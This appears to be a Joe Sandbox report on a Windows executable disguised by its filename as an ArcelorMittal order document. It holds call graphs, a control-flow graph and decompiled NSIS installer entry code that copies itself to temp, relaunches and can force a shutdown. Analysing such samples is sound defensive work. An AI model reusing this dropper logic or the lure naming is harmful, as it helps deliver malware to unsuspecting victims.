13933 4015c0 13932->13933 13934 405a91 4 API calls 13933->13934 13946 4015c9 13934->13946 13935 401629 13937 40165b 13935->13937 13938 40162e 13935->13938 13936 405a13 CharNextW 13936->13946 13941 401423 25 API calls 13937->13941 13939 401423 25 API calls 13938->13939 13940 401635 13939->13940 13958 406032 lstrcpynW 13940->13958 13947 401653 13941->13947 13945 401642 SetCurrentDirectoryW 13945->13947 13946->13935 13946->13936 13948 40160f GetFileAttributesW 13946->13948 13950 4056fa 13946->13950 13953 405660 CreateDirectoryW 13946->13953 13959 4056dd CreateDirectoryW 13946->13959 13948->13946 13951 406408 5 API calls 13950->13951 13952 405701 13951->13952 13952->13946 13954 4056b1 GetLastError 13953->13954 13955 4056ad 13953->13955 13954->13955 13956 4056c0 SetFileSecurityW 13954->13956 13955->13946 13956->13955 13957 4056d6 GetLastError 13956->13957 13957->13955 13958->13945 13960 4056f1 GetLastError 13959->13960 13961 4056ed 13959->13961 13960->13961 13961->13946

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 40327d-4032af SetErrorMode GetVersion 1 4032b1-4032b9 call 406408 0->1 2 4032c2-403355 call 40639c * 3 call 406408 * 2 #17 OleInitialize SHGetFileInfoW call 406032 GetCommandLineW call 406032 GetModuleHandleW 0->2 1->2 7 4032bb 1->7 20 403357-40335e 2->20 21 40335f-403379 call 405a13 CharNextW 2->21 7->2 20->21 24 403491-4034ab GetTempPathW call 40324c 21->24 25 40337f-403385 21->25 32 403503-40351d DeleteFileW call 402dee 24->32 33 4034ad-4034cb GetWindowsDirectoryW lstrcatW call 40324c 24->33 26 403387-40338c 25->26 27 40338e-403394 25->27 26->26 26->27 30 403396-40339a 27->30 31 40339b-40339f 27->31 30->31 34 4033a5-4033ab 31->34 35 40345d-40346a call 405a13 31->35 53 403523-403529 32->53 54 4035ce-4035df call 4037a1 OleUninitialize 32->54 33->32 49 4034cd-4034fd GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40324c 33->49 39 4033c5-4033fe 34->39 40 4033ad-4033b4 34->40 51 40346c-40346d 35->51 52 40346e-403474 35->52 46 403400-403405 39->46 47 40341b-403455 39->47 44 4033b6-4033b9 40->44 45 4033bb 40->45 44->39 44->45 45->39 46->47 48 403407-40340f 46->48 47->35 50 403457-40345b 47->50 56 403411-403414 48->56 57 403416 48->57 49->32 49->54 50->35 59 40347c-40348a call 406032 50->59 51->52 52->25 60 40347a 52->60 61 4035be-4035c5 call 40387b 53->61 62 40352f-40353a call 405a13 53->62 69 403705-40370b 54->69 70 4035e5-4035f5 call 405777 ExitProcess 54->70 56->47 56->57 57->47 65 40348f 59->65 60->65 72 4035ca 61->72 76 403588-403592 62->76 77 40353c-403571 62->77 65->24 74 403789-403791 69->74 75 40370d-403723 GetCurrentProcess OpenProcessToken 69->75 72->54 78 403793 74->78 79 403797-40379b ExitProcess 74->79 83 403725-403753 LookupPrivilegeValueW AdjustTokenPrivileges 75->83 84 403759-403767 call 406408 75->84 81 403594-4035a2 call 405aee 76->81 82 4035fb-40360f call 4056fa lstrcatW 76->82 85 403573-403577 77->85 78->79 81->54 95 4035a4-4035ba call 406032 * 2 81->95 96 403611-403617 lstrcatW 82->96 97 40361c-403636 lstrcatW lstrcmpiW 82->97 83->84 98 403775-403780 ExitWindowsEx 84->98 99 403769-403773 84->99 86 403580-403584 85->86 87 403579-40357e 85->87 86->85 91 403586 86->91 87->86 87->91 91->76 95->61 96->97 97->54 102 403638-40363b 97->102 98->74 100 403782-403784 call 40140b 98->100 99->98 99->100 100->74 105 403644 call 4056dd 102->105 106 40363d-403642 call 405660 102->106 111 403649-403657 SetCurrentDirectoryW 105->111 106->111 114 403664-40368d call 406032 111->114 115 403659-40365f call 406032 111->115 119 403692-4036ae call 406054 DeleteFileW 114->119 115->114 122 4036b0-4036c0 CopyFileW 119->122 123 4036ef-4036f7 119->123 122->123 125 4036c2-4036e2 call 405ed3 call 406054 call 405712 122->125 123->119 124 4036f9-403700 call 405ed3 123->124 124->54 125->123 134 4036e4-4036eb CloseHandle 125->134 134->123
                                                              C-Code - Quality: 82%
                                                              			_entry_() {
                                                              				struct _SHFILEINFOW _v716;
                                                              				int _v720;
                                                              				WCHAR* _v724;
                                                              				struct _TOKEN_PRIVILEGES _v732;
                                                              				signed int _v736;
                                                              				void* _v740;
                                                              				int _v744;
                                                              				WCHAR* _v748;
                                                              				intOrPtr _v752;
                                                              				intOrPtr _v756;
                                                              				int _v764;
                                                              				void* _v772;
                                                              				intOrPtr _t53;
                                                              				WCHAR* _t57;
                                                              				char* _t60;
                                                              				void* _t63;
                                                              				void* _t65;
                                                              				intOrPtr _t67;
                                                              				signed int _t69;
                                                              				int _t72;
                                                              				intOrPtr* _t73;
                                                              				int _t74;
                                                              				int _t76;
                                                              				void* _t100;
                                                              				signed int _t117;
                                                              				void* _t120;
                                                              				void* _t125;
                                                              				intOrPtr _t144;
                                                              				intOrPtr _t145;
                                                              				intOrPtr* _t146;
                                                              				void* _t148;
                                                              				char* _t149;
                                                              				void* _t152;
                                                              				int _t153;
                                                              				signed int _t157;
                                                              				signed int _t162;
                                                              				signed int _t167;
                                                              				void* _t169;
                                                              				void* _t172;
                                                              				int* _t174;
                                                              				signed int _t180;
                                                              				signed int _t183;
                                                              				void* _t184;
                                                              				WCHAR* _t185;
                                                              				int _t191;
                                                              				signed int _t194;
                                                              				void* _t237;
                                                              
                                                              				_t191 = 0;
                                                              				_t184 = 0x20;
                                                              				_v720 = 0;
                                                              				_v724 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                              				_v716.iIcon = 0;
                                                              				SetErrorMode(0x8001); // executed
                                                              				if(GetVersion() != 6) {
                                                              					_t146 = E00406408(0);
                                                              					if(_t146 != 0) {
                                                              						 *_t146(0xc00);
                                                              					}
                                                              				}
                                                              				E0040639C("UXTHEME"); // executed
                                                              				E0040639C("USERENV"); // executed
                                                              				E0040639C("SETUPAPI"); // executed
                                                              				E00406408(9);
                                                              				_t53 = E00406408(7);
                                                              				 *0x7a8a44 = _t53;
                                                              				__imp__#17(_t169, _t148);
                                                              				__imp__OleInitialize(_t191); // executed
                                                              				 *0x7a8af8 = _t53;
                                                              				SHGetFileInfoW(0x79ff00, _t191,  &_v716, 0x2b4, _t191); // executed
                                                              				E00406032("Overcaustically Setup", L"NSIS Error");
                                                              				_t57 = GetCommandLineW();
                                                              				_t149 = L"\"C:\\Users\\Arthur\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe\"";
                                                              				E00406032(_t149, _t57);
                                                              				 *0x7a8a40 = GetModuleHandleW(_t191);
                                                              				_t60 = _t149;
                                                              				if(L"\"C:\\Users\\Arthur\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe\"" == 0x22) {
                                                              					_t60 =  &M007B3002;
                                                              					_t184 = 0x22;
                                                              				}
                                                              				_t153 = CharNextW(E00405A13(_t60, _t184));
                                                              				_v748 = _t153;
                                                              				_t63 =  *_t153;
                                                              				if(_t63 == _t191) {
                                                              					L28:
                                                              					_t185 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                              					GetTempPathW(0x400, _t185);
                                                              					_t65 = E0040324C(_t153, 0);
                                                              					_t219 = _t65;
                                                              					if(_t65 != 0) {
                                                              						L31:
                                                              						DeleteFileW(L"1033"); // executed
                                                              						_t67 = E00402DEE(_t221, _v736); // executed
                                                              						_v752 = _t67;
                                                              						if(_t67 != _t191) {
                                                              							L43:
                                                              							E004037A1();
                                                              							__imp__OleUninitialize();
                                                              							_t233 = _v748 - _t191;
                                                              							if(_v748 == _t191) {
                                                              								__eflags =  *0x7a8ad4 - _t191;
                                                              								if( *0x7a8ad4 == _t191) {
                                                              									L67:
                                                              									_t69 =  *0x7a8aec;
                                                              									__eflags = _t69 - 0xffffffff;
                                                              									if(_t69 != 0xffffffff) {
                                                              										_v744 = _t69;
                                                              									}
                                                              									ExitProcess(_v744);
                                                              								}
                                                              								_t72 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v740);
                                                              								__eflags = _t72;
                                                              								if(_t72 != 0) {
                                                              									LookupPrivilegeValueW(_t191, L"SeShutdownPrivilege",  &(_v732.Privileges));
                                                              									_v732.PrivilegeCount = 1;
                                                              									_v720 = 2;
                                                              									AdjustTokenPrivileges(_v740, _t191,  &_v732, _t191, _t191, _t191);
                                                              								}
                                                              								_t73 = E00406408(4);
                                                              								__eflags = _t73 - _t191;
                                                              								if(_t73 == _t191) {
                                                              									L65:
                                                              									_t74 = ExitWindowsEx(2, 0x80040002);
                                                              									__eflags = _t74;
                                                              									if(_t74 != 0) {
                                                              										goto L67;
                                                              									}
                                                              									goto L66;
                                                              								} else {
                                                              									_t76 =  *_t73(_t191, _t191, _t191, 0x25, 0x80040002);
                                                              									__eflags = _t76;
                                                              									if(_t76 == 0) {
                                                              										L66:
                                                              										E0040140B(9);
                                                              										goto L67;
                                                              									}
                                                              									goto L65;
                                                              								}
                                                              							}
                                                              							E00405777(_v748, 0x200010);
                                                              							ExitProcess(2);
                                                              						}
                                                              						if( *0x7a8a5c == _t191) {
                                                              							L42:
                                                              							 *0x7a8aec =  *0x7a8aec | 0xffffffff;
                                                              							_v744 = E0040387B( *0x7a8aec);
                                                              							goto L43;
                                                              						}
                                                              						_t174 = E00405A13(_t149, _t191);
                                                              						if(_t174 < _t149) {
                                                              							L39:
                                                              							_t230 = _t174 - _t149;
                                                              							_v748 = L"Error launching installer";
                                                              							if(_t174 < _t149) {
                                                              								_t172 = E004056FA(_t233);
                                                              								lstrcatW(_t185, L"~nsu");
                                                              								if(_t172 != _t191) {
                                                              									lstrcatW(_t185, "A");
                                                              								}
                                                              								lstrcatW(_t185, L".tmp");
                                                              								_t151 = L"C:\\Users\\Arthur\\Desktop";
                                                              								if(lstrcmpiW(_t185, L"C:\\Users\\Arthur\\Desktop") != 0) {
                                                              									_push(_t185);
                                                              									if(_t172 == _t191) {
                                                              										E004056DD();
                                                              									} else {
                                                              										E00405660();
                                                              									}
                                                              									SetCurrentDirectoryW(_t185);
                                                              									_t237 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis" - _t191; // 0x43
                                                              									if(_t237 == 0) {
                                                              										E00406032(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis", _t151);
                                                              									}
                                                              									E00406032(0x7a9000, _v740);
                                                              									_t154 = "A" & 0x0000ffff;
                                                              									 *0x7a9800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                              									_t152 = 0x1a;
                                                              									do {
                                                              										E00406054(_t152, 0x79f700, _t185, 0x79f700,  *((intOrPtr*)( *0x7a8a50 + 0x120)));
                                                              										DeleteFileW(0x79f700);
                                                              										if(_v756 != _t191 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", 0x79f700, 1) != 0) {
                                                              											E00405ED3(_t154, 0x79f700, _t191);
                                                              											E00406054(_t152, 0x79f700, _t185, 0x79f700,  *((intOrPtr*)( *0x7a8a50 + 0x124)));
                                                              											_t100 = E00405712(0x79f700);
                                                              											if(_t100 != _t191) {
                                                              												CloseHandle(_t100);
                                                              												_v748 = _t191;
                                                              											}
                                                              										}
                                                              										 *0x7a9800 =  *0x7a9800 + 1;
                                                              										_t152 = _t152 - 1;
                                                              									} while (_t152 != 0);
                                                              									E00405ED3(_t154, _t185, _t191);
                                                              								}
                                                              								goto L43;
                                                              							}
                                                              							 *_t174 = _t191;
                                                              							_t175 =  &(_t174[2]);
                                                              							if(E00405AEE(_t230,  &(_t174[2])) == 0) {
                                                              								goto L43;
                                                              							}
                                                              							E00406032(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis", _t175);
                                                              							E00406032(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate", _t175);
                                                              							_v764 = _t191;
                                                              							goto L42;
                                                              						}
                                                              						asm("cdq");
                                                              						asm("cdq");
                                                              						asm("cdq");
                                                              						_t157 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                              						_t117 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t162 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                              						while( *_t174 != _t157 || _t174[1] != _t117) {
                                                              							_t174 = _t174;
                                                              							if(_t174 >= _t149) {
                                                              								continue;
                                                              							}
                                                              							break;
                                                              						}
                                                              						_t191 = 0;
                                                              						goto L39;
                                                              					}
                                                              					GetWindowsDirectoryW(_t185, 0x3fb);
                                                              					lstrcatW(_t185, L"\\Temp");
                                                              					_t120 = E0040324C(_t153, _t219);
                                                              					_t220 = _t120;
                                                              					if(_t120 != 0) {
                                                              						goto L31;
                                                              					}
                                                              					GetTempPathW(0x3fc, _t185);
                                                              					lstrcatW(_t185, L"Low");
                                                              					SetEnvironmentVariableW(L"TEMP", _t185);
                                                              					SetEnvironmentVariableW(L"TMP", _t185);
                                                              					_t125 = E0040324C(_t153, _t220);
                                                              					_t221 = _t125;
                                                              					if(_t125 == 0) {
                                                              						goto L43;
                                                              					}
                                                              					goto L31;
                                                              				} else {
                                                              					goto L6;
                                                              				}
                                                              				do {
                                                              					L6:
                                                              					_t162 = 0x20;
                                                              					if(_t63 != _t162) {
                                                              						L8:
                                                              						_t194 = _t162;
                                                              						if( *_t153 == 0x22) {
                                                              							_t153 = _t153 + 2;
                                                              							_t194 = 0x22;
                                                              						}
                                                              						if( *_t153 != 0x2f) {
                                                              							goto L22;
                                                              						} else {
                                                              							_t153 = _t153 + 2;
                                                              							if( *_t153 == 0x53) {
                                                              								_t145 =  *((intOrPtr*)(_t153 + 2));
                                                              								if(_t145 == _t162 || _t145 == 0) {
                                                              									 *0x7a8ae0 = 1;
                                                              								}
                                                              							}
                                                              							asm("cdq");
                                                              							asm("cdq");
                                                              							_t167 = L"NCRC" & 0x0000ffff;
                                                              							asm("cdq");
                                                              							_t180 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t167;
                                                              							if( *_t153 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t167) &&  *((intOrPtr*)(_t153 + 4)) == _t180) {
                                                              								_t144 =  *((intOrPtr*)(_t153 + 8));
                                                              								if(_t144 == 0x20 || _t144 == 0) {
                                                              									_v736 = _v736 | 0x00000004;
                                                              								}
                                                              							}
                                                              							asm("cdq");
                                                              							asm("cdq");
                                                              							_t162 = L" /D=" & 0x0000ffff;
                                                              							asm("cdq");
                                                              							_t183 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t162;
                                                              							if( *(_t153 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t162) ||  *_t153 != _t183) {
                                                              								goto L22;
                                                              							} else {
                                                              								 *(_t153 - 4) =  *(_t153 - 4) & 0x00000000;
                                                              								__eflags = _t153;
                                                              								E00406032(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis", _t153);
                                                              								L27:
                                                              								_t191 = 0;
                                                              								goto L28;
                                                              							}
                                                              						}
                                                              					} else {
                                                              						goto L7;
                                                              					}
                                                              					do {
                                                              						L7:
                                                              						_t153 = _t153 + 2;
                                                              					} while ( *_t153 == _t162);
                                                              					goto L8;
                                                              					L22:
                                                              					_t153 = E00405A13(_t153, _t194);
                                                              					if( *_t153 == 0x22) {
                                                              						_t153 = _t153 + 2;
                                                              					}
                                                              					_t63 =  *_t153;
                                                              				} while (_t63 != 0);
                                                              				goto L27;
                                                              			}


















































                                                              0x00403287
                                                              0x00403289
                                                              0x0040328a
                                                              0x00403293
                                                              0x0040329b
                                                              0x0040329f
                                                              0x004032af
                                                              0x004032b2
                                                              0x004032b9
                                                              0x004032c0
                                                              0x004032c0
                                                              0x004032b9
                                                              0x004032c9
                                                              0x004032d3
                                                              0x004032dd
                                                              0x004032e4
                                                              0x004032eb
                                                              0x004032f0
                                                              0x004032f5
                                                              0x004032fc
                                                              0x00403302
                                                              0x00403318
                                                              0x00403328
                                                              0x0040332d
                                                              0x00403333
                                                              0x0040333a
                                                              0x0040334e
                                                              0x00403353
                                                              0x00403355
                                                              0x00403359
                                                              0x0040335e
                                                              0x0040335e
                                                              0x0040336d
                                                              0x0040336f
                                                              0x00403373
                                                              0x00403379
                                                              0x00403491
                                                              0x00403497
                                                              0x004034a2
                                                              0x004034a4
                                                              0x004034a9
                                                              0x004034ab
                                                              0x00403503
                                                              0x00403508
                                                              0x00403512
                                                              0x00403519
                                                              0x0040351d
                                                              0x004035ce
                                                              0x004035ce
                                                              0x004035d3
                                                              0x004035d9
                                                              0x004035df
                                                              0x00403705
                                                              0x0040370b
                                                              0x00403789
                                                              0x00403789
                                                              0x0040378e
                                                              0x00403791
                                                              0x00403793
                                                              0x00403793
                                                              0x0040379b
                                                              0x0040379b
                                                              0x0040371b
                                                              0x00403721
                                                              0x00403723
                                                              0x00403730
                                                              0x00403743
                                                              0x0040374b
                                                              0x00403753
                                                              0x00403753
                                                              0x0040375b
                                                              0x00403760
                                                              0x00403767
                                                              0x00403775
                                                              0x00403778
                                                              0x0040377e
                                                              0x00403780
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403769
                                                              0x0040376f
                                                              0x00403771
                                                              0x00403773
                                                              0x00403782
                                                              0x00403784
                                                              0x00000000
                                                              0x00403784
                                                              0x00000000
                                                              0x00403773
                                                              0x00403767
                                                              0x004035ee
                                                              0x004035f5
                                                              0x004035f5
                                                              0x00403529
                                                              0x004035be
                                                              0x004035be
                                                              0x004035ca
                                                              0x00000000
                                                              0x004035ca
                                                              0x00403536
                                                              0x0040353a
                                                              0x00403588
                                                              0x00403588
                                                              0x0040358a
                                                              0x00403592
                                                              0x00403606
                                                              0x00403608
                                                              0x0040360f
                                                              0x00403617
                                                              0x00403617
                                                              0x00403622
                                                              0x00403627
                                                              0x00403636
                                                              0x0040363a
                                                              0x0040363b
                                                              0x00403644
                                                              0x0040363d
                                                              0x0040363d
                                                              0x0040363d
                                                              0x0040364a
                                                              0x00403650
                                                              0x00403657
                                                              0x0040365f
                                                              0x0040365f
                                                              0x0040366d
                                                              0x00403679
                                                              0x00403687
                                                              0x0040368c
                                                              0x00403692
                                                              0x0040369e
                                                              0x004036a4
                                                              0x004036ae
                                                              0x004036c4
                                                              0x004036d5
                                                              0x004036db
                                                              0x004036e2
                                                              0x004036e5
                                                              0x004036eb
                                                              0x004036eb
                                                              0x004036e2
                                                              0x004036ef
                                                              0x004036f6
                                                              0x004036f6
                                                              0x004036fb
                                                              0x004036fb
                                                              0x00000000
                                                              0x00403636
                                                              0x00403594
                                                              0x00403597
                                                              0x004035a2
                                                              0x00000000
                                                              0x00000000
                                                              0x004035aa
                                                              0x004035b5
                                                              0x004035ba
                                                              0x00000000
                                                              0x004035ba
                                                              0x00403543
                                                              0x0040355b
                                                              0x0040356c
                                                              0x0040356d
                                                              0x00403571
                                                              0x00403573
                                                              0x00403581
                                                              0x00403584
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403584
                                                              0x00403586
                                                              0x00000000
                                                              0x00403586
                                                              0x004034b3
                                                              0x004034bf
                                                              0x004034c4
                                                              0x004034c9
                                                              0x004034cb
                                                              0x00000000
                                                              0x00000000
                                                              0x004034d3
                                                              0x004034db
                                                              0x004034ec
                                                              0x004034f4
                                                              0x004034f6
                                                              0x004034fb
                                                              0x004034fd
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040337f
                                                              0x0040337f
                                                              0x00403381
                                                              0x00403385
                                                              0x0040338e
                                                              0x00403392
                                                              0x00403394
                                                              0x00403399
                                                              0x0040339a
                                                              0x0040339a
                                                              0x0040339f
                                                              0x00000000
                                                              0x004033a5
                                                              0x004033a6
                                                              0x004033ab
                                                              0x004033ad
                                                              0x004033b4
                                                              0x004033bb
                                                              0x004033bb
                                                              0x004033b4
                                                              0x004033cc
                                                              0x004033df
                                                              0x004033e0
                                                              0x004033f5
                                                              0x004033fa
                                                              0x004033fe
                                                              0x00403407
                                                              0x0040340f
                                                              0x00403416
                                                              0x00403416
                                                              0x0040340f
                                                              0x00403422
                                                              0x00403435
                                                              0x00403436
                                                              0x0040344b
                                                              0x00403451
                                                              0x00403455
                                                              0x00000000
                                                              0x0040347c
                                                              0x0040347c
                                                              0x00403481
                                                              0x0040348a
                                                              0x0040348f
                                                              0x0040348f
                                                              0x00000000
                                                              0x0040348f
                                                              0x00403455
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403387
                                                              0x00403387
                                                              0x00403388
                                                              0x00403389
                                                              0x00000000
                                                              0x0040345d
                                                              0x00403464
                                                              0x0040346a
                                                              0x0040346d
                                                              0x0040346d
                                                              0x0040346e
                                                              0x00403471
                                                              0x00000000

                                                              APIs
                                                              • SetErrorMode.KERNELBASE ref: 0040329F
                                                              • GetVersion.KERNEL32 ref: 004032A5
                                                              • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004032F5
                                                              • OleInitialize.OLE32(00000000), ref: 004032FC
                                                              • SHGetFileInfoW.SHELL32(0079FF00,00000000,?,000002B4,00000000), ref: 00403318
                                                              • GetCommandLineW.KERNEL32(Overcaustically Setup,NSIS Error), ref: 0040332D
                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",00000000), ref: 00403340
                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",00000020), ref: 00403367
                                                                • Part of subcall function 00406408: GetModuleHandleA.KERNEL32(?,?,00000020,004032E9,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040641A
                                                                • Part of subcall function 00406408: GetProcAddress.KERNEL32(00000000,?), ref: 00406435
                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034A2
                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034B3
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034BF
                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034D3
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034DB
                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034EC
                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034F4
                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403508
                                                                • Part of subcall function 00406032: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,0040332D,Overcaustically Setup,NSIS Error), ref: 0040603F
                                                              • OleUninitialize.OLE32(?), ref: 004035D3
                                                              • ExitProcess.KERNEL32 ref: 004035F5
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403608
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403617
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403622
                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",00000000,?), ref: 0040362E
                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040364A
                                                              • DeleteFileW.KERNEL32(0079F700,0079F700,?,007A9000,?), ref: 004036A4
                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,0079F700,00000001), ref: 004036B8
                                                              • CloseHandle.KERNEL32(00000000,0079F700,0079F700,?,0079F700,00000000), ref: 004036E5
                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403714
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040371B
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403730
                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403753
                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403778
                                                              • ExitProcess.KERNEL32 ref: 0040379B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                              • String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate$C:\Users\user\Desktop$C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe$Error launching installer$Low$NSIS Error$Overcaustically Setup$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                              • API String ID: 3586999533-1936791483
                                                              • Opcode ID: 55e1c2b6fe71988611f999325c05d3c9627bfef59b93c94f4dc9f559726788cb
                                                              • Instruction ID: 4150c076459d7de682cc7567c7be7d1922bd71d2f30956bacb70bd1bfbc75f2d
                                                              • Opcode Fuzzy Hash: 55e1c2b6fe71988611f999325c05d3c9627bfef59b93c94f4dc9f559726788cb
                                                              • Instruction Fuzzy Hash: A1D10770240310ABD710BF659D45B2B3AADEB81746F11843FF581B62D2DF7D8A418B6E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
